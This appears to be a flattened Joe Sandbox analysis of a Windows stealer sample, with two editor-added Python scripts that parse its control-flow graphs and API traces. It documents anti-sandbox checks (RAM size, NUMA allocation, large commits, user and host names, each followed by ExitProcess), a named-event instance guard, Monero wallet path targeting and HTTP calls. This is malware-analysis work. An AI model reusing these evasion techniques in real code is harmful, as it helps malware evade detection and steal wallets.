                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 99016862f2f99a61ba473ccf8b268f680097bb38514bfc8a9f48f3f50006eef0
                  • Instruction ID: 8ae2bc941910d0dcd0fa0b1f461809dd5693b03c33fe0b8bf2265d7efcad80e7
                  • Opcode Fuzzy Hash: 99016862f2f99a61ba473ccf8b268f680097bb38514bfc8a9f48f3f50006eef0
                  • Instruction Fuzzy Hash: 6E51ADB5A0020AEBCB04DFA0DA56FBE37B6BF45704F10404DE40AA7341DB74E961EB62

                  Control-flow Graph

                  The graph is an image in the report (legend: executed / not executed blocks); its flattened node and edge list is replaced here by the structure it encodes:
                  • fc7500: GetWindowsDirectoryA into a 0x104 (MAX_PATH) buffer; fc754c is a one-block alternate taken on one outcome of the call, after which both paths join at fc7553
                  • fc7553: GetVolumeInformationA on a drive root assembled from the strings "C", ":" and "\" listed under Similarity, followed by three fc8d00 calls; fc75d8 / fc75e1 form a loop of further fc8d00 calls
                  • fc75fc: GetProcessHeap + RtlAllocateHeap; fc7628 formats the value with wsprintfA (fc7619 is the path that skips the formatting), then fca740 (lstrcpy) stores the result on both paths before the return at fc767e
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FC7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FC757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC760A
                  • wsprintfA.USER32 ref: 00FC7640
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: the same fourteen .sdmp regions listed under the preceding function entries
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                  • Instruction ID: 2712be0a69d85e1007cea3d592c4c9894c0f4f8c950142022b12f07c1e62627c
                  • Opcode Fuzzy Hash: 186c4fd966f13d28e794d9c394a3db1100a680088ad5755af89cba24358b1045
                  • Instruction Fuzzy Hash: 4A418FB1D04349ABDB10DB94DD46FEEBBB8AF48714F10019CF50967280DB78AA84DFA5

                  Control-flow Graph

                  Not rendered in the report for this function (refs 00FC6ACA to 00FC6B22). Read from the call list below: the function first resolves a second set of fourteen imports from the module at 74DD0000 by pointer-named GetProcAddress (fc9860), then runs a chain of pre-flight checks, most of which contain their own ExitProcess: fb1160 (GetSystemInfo), fb1110 (VirtualAllocExNuma on the current process with 0x7D0 bytes, MEM_COMMIT | MEM_RESERVE = 0x3000, PAGE_EXECUTE_READWRITE = 0x40, NUMA node 0; a call commonly chosen because emulators often lack it), fb1220 (GlobalMemoryStatusEx with dwLength = 0x40, the size of MEMORYSTATUSEX, followed by two unsigned 64-bit divisions through __aulldiv before the comparison), fc6770 (GetUserDefaultLangID), fb11d0, and fb1190, whose ExitProcess at 00FB11C6 follows the fc7850 call (GetUserNameA into a 0x104-byte heap buffer; the return address 00FB11B7 in that subcall's argument list places the call inside fb1190), i.e. a user-name check. fc78e0 collects the computer name the same way, fca9b0 (lstrlen / lstrcpy / lstrcat) builds paths such as \Monero\wallet.keys, and the function finishes with OpenEventA (0x1F0003 = EVENT_ALL_ACCESS) followed by CreateEventA, CloseHandle, Sleep(0x1770) = 6000 ms, CloseHandle and ExitProcess, the open-then-create pattern of a named-object single-instance guard.
                  APIs
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82320), ref: 00FC98A1
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C823E0), ref: 00FC98BA
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82440), ref: 00FC98D2
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82218), ref: 00FC98EA
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82350), ref: 00FC9903
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C88FD8), ref: 00FC991B
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C75DF0), ref: 00FC9933
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C75AF0), ref: 00FC994C
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C823B0), ref: 00FC9964
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C824E8), ref: 00FC997C
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C82500), ref: 00FC9995
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C823F8), ref: 00FC99AD
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C75AD0), ref: 00FC99C5
                    • Part of subcall function 00FC9860: GetProcAddress.KERNEL32(74DD0000,00C824B8), ref: 00FC99DE
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FB11D0: ExitProcess.KERNEL32 ref: 00FB1211
                    • Part of subcall function 00FB1160: GetSystemInfo.KERNEL32(?), ref: 00FB116A
                    • Part of subcall function 00FB1160: ExitProcess.KERNEL32 ref: 00FB117E
                    • Part of subcall function 00FB1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                    • Part of subcall function 00FB1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                    • Part of subcall function 00FB1110: ExitProcess.KERNEL32 ref: 00FB1143
                    • Part of subcall function 00FB1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                    • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1258
                    • Part of subcall function 00FB1220: __aulldiv.LIBCMT ref: 00FB1266
                    • Part of subcall function 00FB1220: ExitProcess.KERNEL32 ref: 00FB1294
                    • Part of subcall function 00FC6770: GetUserDefaultLangID.KERNEL32 ref: 00FC6774
                    • Part of subcall function 00FB1190: ExitProcess.KERNEL32 ref: 00FB11C6
                    • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                    • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                    • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                    • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                    • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                    • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                  • Sleep.KERNEL32(00001770), ref: 00FC6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                  • ExitProcess.KERNEL32 ref: 00FC6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: the same fourteen .sdmp regions listed under the preceding function entries
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                  • Instruction ID: b35c8548161423df7e642f36d339c121d77aba8d82cd1ddf829594c1ae7bec43
                  • Opcode Fuzzy Hash: 8f4e06549d4691621c896dfa246ecd627770b39dedce45e44480e27fc5f12819
                  • Instruction Fuzzy Hash: 53310B7190420EAADB18F7A0ED57FEE7778AF44304F50452CF212A21C1DF786945EBA6

                   Control-flow Graph (basic blocks with the calls they contain; "→" lists successor blocks)
                   • 1436 fb1220-fb1247: call fc89b0, GlobalMemoryStatusEx → 1439, 1440
                   • 1439 fb1249-fb1271: call fcda00 (×2) → 1441
                   • 1440 fb1273-fb127a → 1441
                   • 1441 fb1281-fb1285 → 1443, 1444
                   • 1443 fb129a-fb129d (no successors, function leaves without ExitProcess)
                   • 1444 fb1287 → 1447, 1448
                   • 1447 fb1289-fb1290 → 1443, 1448
                   • 1448 fb1292-fb1294: ExitProcess
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E
                  • __aulldiv.LIBCMT ref: 00FB1258
                  • __aulldiv.LIBCMT ref: 00FB1266
                  • ExitProcess.KERNEL32 ref: 00FB1294
                  Strings
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                  • Instruction ID: 2e3791b1631e9d52ccfa9ff31ae6c7bd0cb1f0acc773e526b095fd47577329d9
                  • Opcode Fuzzy Hash: 3e253fbad67b38f9cdcf73424743f2889f635da81a3b6474b01da4633d313ec3
                  • Instruction Fuzzy Hash: 74014BB0D40308AAEB10DBE1DC4ABAEBB78BF04701F608068E605B6280D67866459B99

                   Control-flow Graph (basic blocks with the calls they contain; "→" lists successor blocks)
                   • 1450 fc6af3 → 1451
                   • 1451 fc6b0a → 1453, 1454
                   • 1453 fc6b0c-fc6b22: call fc6920, call fc5b10, CloseHandle, ExitProcess
                   • 1454 fc6aba-fc6ad7: call fcaad0, OpenEventA → 1460, 1461
                   • 1460 fc6ad9-fc6af1: call fcaad0, CreateEventA → 1453
                   • 1461 fc6af5-fc6b04: CloseHandle, Sleep → 1451 (loop back to the OpenEventA branch)
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00FC6AF9
                  • Sleep.KERNEL32(00001770), ref: 00FC6B04
                  • CloseHandle.KERNEL32(?,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6B1A
                  • ExitProcess.KERNEL32 ref: 00FC6B22
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                  • Instruction ID: f2b777320bddb0558cbf8d1f16d76a1efc2a2a4c35397fabce51c643f401d920
                  • Opcode Fuzzy Hash: e325c05725a5fd67ae57e791491075f8be4802e217d0ce9ae5e132d42ff001dd
                  • Instruction Fuzzy Hash: BDF0307094420BAAE714ABA0AE07F7D7B74EF44705F10452CB527E2181DBB86981F755
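                   The two "control_flow_graph …" strings on this page are the graph source that the interactive viewer left behind when the page was flattened. The Python below is added by the editor and is not part of the Joe Sandbox report: it parses that text into basic blocks and successor edges, then finds the "gate" blocks, i.e. branches where one side can only end in ExitProcess while the other side can still leave the function normally. Both graph strings are copied from this page; the gate definition and the notion of a "returning" terminal block are the editor's own reading, not an output of the sandbox.

```python
"""Parse the flattened 'control_flow_graph ...' text of a Joe Sandbox function
record and locate the blocks that decide between ExitProcess and a return.
Editor's example; the graph strings are copied from this page."""
import re

# node: 4-digit id, then a 6-hex-digit address or address range
NODE_RE = re.compile(r"(?<!\w)(\d{4})(?!\d)\s+([0-9a-f]{6}(?:-[0-9a-f]{6})?)\b")
EDGE_RE = re.compile(r"(\d+)->(\d+)")


def parse_cfg(text: str):
    """-> ({node_id: (address_range, label)}, [(src, dst), ...])"""
    edges = [(int(a), int(b)) for a, b in EDGE_RE.findall(text)]
    body = EDGE_RE.sub(" ", re.sub(r"^\s*control_flow_graph\s*", "", text))
    nodes, found = {}, list(NODE_RE.finditer(body))
    for i, m in enumerate(found):
        end = found[i + 1].start() if i + 1 < len(found) else len(body)
        # everything between this node header and the next one is its label
        nodes[int(m.group(1))] = (m.group(2), " ".join(body[m.end():end].split()))
    return nodes, edges


def _backward_closure(pred, seeds):
    """All nodes from which some node in `seeds` is reachable (including seeds)."""
    seen, stack = set(seeds), list(seeds)
    while stack:
        for p in pred.get(stack.pop(), ()):
            if p not in seen:
                seen.add(p)
                stack.append(p)
    return seen


def _simple_paths(succ, node, targets, path, out):
    path.append(node)
    if node in targets:
        out.append(list(path))
    else:
        for s in succ.get(node, ()):
            if s not in path:  # do not follow back edges (loops)
                _simple_paths(succ, s, targets, path, out)
    path.pop()


def analyze_cfg(text: str) -> dict:
    nodes, edges = parse_cfg(text)
    succ, pred = {}, {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
        pred.setdefault(b, []).append(a)
    entry = [n for n in nodes if n not in pred]
    exits = {n for n, (_, lbl) in nodes.items() if "ExitProcess" in lbl}
    # terminal blocks without ExitProcess: the function leaves normally there
    returns = {n for n in nodes if n not in succ and n not in exits}
    can_exit = _backward_closure(pred, exits)
    can_return = _backward_closure(pred, returns)
    # gate: one successor can only end in ExitProcess, another can still return
    gates = sorted(n for n in nodes
                   if any(s in can_exit and s not in can_return for s in succ.get(n, ()))
                   and any(s in can_return for s in succ.get(n, ())))
    paths = []
    for e in entry:
        _simple_paths(succ, e, exits, [], paths)
    return {"entry": entry, "exits": sorted(exits), "gates": gates,
            "gate_blocks": [nodes[g][0] for g in gates],
            "always_exits": bool(entry) and not any(e in can_return for e in entry),
            "exit_paths": paths}


# Constructed input: the two graph strings exactly as they appear on this page.
CFG_MEMORY_CHECK = (
    "control_flow_graph 1436 fb1220-fb1247 call fc89b0 GlobalMemoryStatusEx "
    "1439 fb1249-fb1271 call fcda00 * 2 1436->1439 1440 fb1273-fb127a 1436->1440 "
    "1441 fb1281-fb1285 1439->1441 1440->1441 1443 fb129a-fb129d 1441->1443 "
    "1444 fb1287 1441->1444 1447 fb1289-fb1290 1444->1447 1448 fb1292-fb1294 "
    "ExitProcess 1444->1448 1447->1443 1447->1448")
CFG_EVENT_GATE = (
    "control_flow_graph 1450 fc6af3 1451 fc6b0a 1450->1451 1453 fc6b0c-fc6b22 "
    "call fc6920 call fc5b10 CloseHandle ExitProcess 1451->1453 1454 fc6aba-fc6ad7 "
    "call fcaad0 OpenEventA 1451->1454 1460 fc6ad9-fc6af1 call fcaad0 CreateEventA "
    "1454->1460 1461 fc6af5-fc6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451")

if __name__ == "__main__":
    for name, text in (("memory check", CFG_MEMORY_CHECK), ("event gate", CFG_EVENT_GATE)):
        print(name, analyze_cfg(text))
```

                   For the GlobalMemoryStatusEx function the analysis reports two gate blocks (fb1287 and fb1289-fb1290), both sitting after the two __aulldiv calls and both with ExitProcess as one outcome; for the OpenEventA/CreateEventA function it reports no gate at all, because every path through that graph ends in block fc6b0c-fc6b22 and therefore in ExitProcess.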

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                  Strings
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 9c92bc86a21b628652289439950a84916824ab1f6bdb27ff69d108aba2bcd2ce
                  • Instruction ID: 0a7229e7f6386b438e791c7de1e2d485b3b11a592417431db25c490df44b6d84
                  • Opcode Fuzzy Hash: 9c92bc86a21b628652289439950a84916824ab1f6bdb27ff69d108aba2bcd2ce
                  • Instruction Fuzzy Hash: 70212CB1D00209ABDF14DFA5E945BDD7B74FB44320F108629E929A72C0DB746A05DB91

                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                    • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6303
                    • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                    • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB6385
                    • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                    • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                  Strings
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                  • Instruction ID: 5ca118c45b310877e2c0459afa5c05bb17a3a3ae7f73012344c495b8d407527b
                  • Opcode Fuzzy Hash: 125695dd08d501fe21d1d846b4fcc015415a0b6bfe5de77bae986e875a908152
                  • Instruction Fuzzy Hash: B711F830900009ABCB18FB61DE57FED7378AF50304F80415CA81A4A192EF38BB15EA92
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132
                  • ExitProcess.KERNEL32 ref: 00FB1143
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                  • Instruction ID: 75fcfaf015bf4fbe6b0a833dae08aef115dd6222ef7aaf758c1723f241da6c4d
                  • Opcode Fuzzy Hash: d435aa593cec33fc1fd0b6295fb9b58112fa3b547148d7639fa6e33461f4167c
                  • Instruction Fuzzy Hash: 16E08670945308FBE7246BA1EC1AB48767CAF04B02F500158F70D771C4C6F926419B98
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FB10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FB10F7
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                  • Instruction ID: 29e7c0a3c31356872067b4a712dc2bd80a180e28e6d9c327df7fc4f59da43341
                  • Opcode Fuzzy Hash: 71573933745f1eb47203e8541e2dc4b82e19289bd1f56df2ed43b17e965b6a6b
                  • Instruction Fuzzy Hash: C5F0E971641204BBE71496A4AC59FAAB7D8E705B55F300458F504E3280D5726E40DB50
                  APIs
                    • Part of subcall function 00FC78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                    • Part of subcall function 00FC78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                    • Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                    • Part of subcall function 00FC7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                    • Part of subcall function 00FC7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                    • Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                  • ExitProcess.KERNEL32 ref: 00FB11C6
                   Memory Dump Source
                   • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true (associated dumps identical to the list above)
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                  • Instruction ID: fef84329eaefb41e387e83d8ea625990b8a309eb7f32de4e446d5221c0077e09
                  • Opcode Fuzzy Hash: aa463097211b01f82bfbf8afeb958f92abd3c5947cd00f96500ef05ef328490a
                  • Instruction Fuzzy Hash: 1AE0C2B5D0030223CA1433B6BD0BF2A328C6F40385F20043CFA09C3142FA2DF801AA64
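                   Several of the records above share one shape: a query of the environment (total physical memory via GlobalMemoryStatusEx, a NUMA-aware allocation via VirtualAllocExNuma, a large VirtualAlloc commit, the computer and user name) followed by ExitProcess. The Python below is added by the editor and is not part of the Joe Sandbox report: it parses "APIs" lines in the exact format printed on this page, decodes the hex arguments it recognises (MEM_* and PAGE_* flags, the Sleep interval in milliseconds) and reports which probe-then-exit chains each record contains. The record labels, the rule set and the 256 MiB threshold for a "large" commit are the editor's choices; the argument values printed on the GetCurrentProcess line are read as the stack already prepared for the VirtualAllocExNuma call that follows it, since GetCurrentProcess itself takes no parameters.

```python
"""Parse the 'APIs' lines of Joe Sandbox function records and flag environment
probes that are followed by ExitProcess.  Editor's example; the API lines below
are copied from this page, the record labels and rules are the editor's own."""
import re
from dataclasses import dataclass
from typing import Optional

CALL_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
PAGE_PROT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}


@dataclass
class Call:
    api: str
    module: str
    args: list              # int for hex values, None for '?', str for literals
    ref: int
    subcall: Optional[int]  # callee address when the line is 'Part of subcall function'


def parse_call(line: str) -> Optional[Call]:
    """One '• Api.MODULE(args), ref: addr' line -> Call, or None if not a call line."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    args = []
    for a in (m.group("args") or "").split(","):
        a = a.strip()
        if not a:
            continue
        if a == "?":
            args.append(None)  # value not recovered by the tracer
        elif re.fullmatch(r"[0-9A-Fa-f]{1,8}", a):
            args.append(int(a, 16))  # caveat: a literal such as 'ADD' would also pass
        else:
            args.append(a)
    sub = m.group("sub")
    return Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                int(sub, 16) if sub else None)


def flags(value: int, table: dict) -> str:
    return "|".join(n for bit, n in sorted(table.items()) if value & bit) or hex(value)


def in_order(calls, names) -> bool:
    """True if the API names occur in this order (gaps allowed) in the call list."""
    it = iter(c.api for c in calls)
    return all(name in it for name in names)


def analyze(calls) -> list:
    direct = [c for c in calls if c.subcall is None]  # calls made by the function itself
    seen = {c.api for c in calls}                       # including subcall lines
    found = []
    if in_order(direct, ["GlobalMemoryStatusEx", "__aulldiv", "ExitProcess"]):
        found.append("RAM-size probe: GlobalMemoryStatusEx result scaled by 64-bit "
                     "division, ExitProcess on the failing branch")
    if in_order(direct, ["VirtualAllocExNuma", "ExitProcess"]):
        found.append("NUMA allocation probe: VirtualAllocExNuma then ExitProcess")
    for c in direct:
        if c.api == "VirtualAlloc" and len(c.args) >= 4 and isinstance(c.args[1], int) \
                and c.args[1] >= 256 << 20:  # editor's threshold for 'large'
            found.append(f"large commit probe: VirtualAlloc {c.args[1] // (1 << 20)} MiB "
                         f"{flags(c.args[2], MEM_FLAGS)} {PAGE_PROT.get(c.args[3], hex(c.args[3]))}")
    if seen & {"GetComputerNameA", "GetUserNameA"} and "ExitProcess" in {c.api for c in direct}:
        found.append("host/user name check: GetComputerNameA/GetUserNameA feed an ExitProcess decision")
    if in_order(direct, ["OpenEventA", "Sleep"]) and "CreateEventA" in seen:
        ms = next(c.args[0] for c in direct if c.api == "Sleep")
        found.append(f"named-event instance gate: OpenEventA/CreateEventA with a {ms} ms Sleep in the retry loop")
    return found


def analyze_records(records: dict) -> dict:
    return {name: analyze([c for c in map(parse_call, lines) if c]) for name, lines in records.items()}


# Constructed input: 'APIs' lines copied from the records on this page; labels are editor's shorthand.
RECORDS = {
    "fb1220": ["• GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FB123E",
               "• __aulldiv.LIBCMT ref: 00FB1258", "• __aulldiv.LIBCMT ref: 00FB1266",
               "• ExitProcess.KERNEL32 ref: 00FB1294"],
    "fc6ab0": ["• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00C89008,?,00FD110C,?,00000000,?,00FD1110,?,00000000,00FD0AEF), ref: 00FC6ACA",
               "• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC6AE8",
               "• CloseHandle.KERNEL32(00000000), ref: 00FC6AF9", "• Sleep.KERNEL32(00001770), ref: 00FC6B04",
               "• ExitProcess.KERNEL32 ref: 00FC6B22"],
    "fb1100": ["• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FB112B",
               "• VirtualAllocExNuma.KERNEL32(00000000), ref: 00FB1132", "• ExitProcess.KERNEL32 ref: 00FB1143"],
    "fb1090": ["• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FB10B3",
               "• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00FB10F7"],
    "fb11b0": ["• Part of subcall function 00FC78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F",
               "• Part of subcall function 00FC7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F",
               "• ExitProcess.KERNEL32 ref: 00FB11C6"],
}

if __name__ == "__main__":
    for name, hits in analyze_records(RECORDS).items():
        print(name, hits)
```

                   Subcall lines contribute API names but not ordering, because the tracer prints them out of sequence relative to the function's own calls; that is why the name check only requires that the name APIs appear somewhere and ExitProcess appears among the direct calls. The VirtualAlloc size 17C841C0 decodes to 399,000,000 bytes (380 MiB) with MEM_COMMIT|MEM_RESERVE and PAGE_READWRITE, and the matching VirtualFree passes 00008000 (MEM_RELEASE), which is the shape of a check that the host can actually back a large commit.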
                  APIs
                  • wsprintfA.USER32 ref: 00FC38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC38E3
